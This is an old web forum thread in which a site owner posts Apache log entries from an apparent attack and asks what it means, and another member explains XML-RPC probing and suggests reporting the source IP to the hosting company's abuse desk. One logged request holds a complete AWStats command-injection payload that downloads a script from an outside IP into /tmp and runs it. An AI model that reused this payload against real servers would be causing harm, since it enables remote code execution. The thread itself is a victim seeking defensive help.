Need Help

[Thamer]

Hi all , I am a new member of this Big Forum ,,

I was looking for some information to know something about hacker attacks !!

How can I discover everything about these attacks ( The Hacker info ) ,
and the Vulnerabilities that the hacker was trying to find ? and what are they about ?


[b - [17/Feb/2006:14:28:43 +0100] “GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|HTTP/1.1”404 295

- [17/Feb/2006:14:28:43 +0100] “POST /xmlrpc.php HTTP/1.1”404 287
- [17/Feb/2006:14:28:43 +0100] “POST/blog/xmlrpc.php HTTP/1.1”404 292
- [17/Feb/2006:14:28:43 +0100] “POST/blog/xmlsrv/xmlrpc.php HTTP/1.1”
- [17/Feb/2006:14:28:43 +0100] “POST/drupal/xmlrpc.php HTTP/1.1” 404 294
- [17/Feb/2006:14:28:43 +0100] “POST/phpgroupware/xmlrpc.php HTTP/1.1”
- [17/Feb/2006:14:28:43 +0100] “POST /wordpress/xmlrpc.php HTTP/1.1” 404
- [17/Feb/2006:14:28:43 +0100] “POST/xmlrpc.php HTTP/1.1” 404 287[/b]

Kind reagards,

Thamer
[/img]

[Alexei Kubarev]

XML-RPC is a XML Repote Proceedure Call.

This is used in frmaeworks like drupal pretty often. The vulnerability? well, mostly they were trying "something"
There might by some vulnerability in older versions but im not sure about that. wordpress had some problem as i recall

[Thamer]

Thanks Alexei for your reply

but how can I know some information about this hacker ? or any software thats gives me some

202.8.85.234 - - [17/Feb/2006:14:28:43 +0100]

again .. many thanks

[Alexei Kubarev]

oh well this is pretty fun as http://202.8.85.234
will let you come to a webhosting company or something
atleast its powered by ISPConfig, an opensourse ISP and hosting managemennt CP.

so it will be hard to know who did that.. however you way want to try to fins the webhotel and send an email to an abuse center of that webhotel.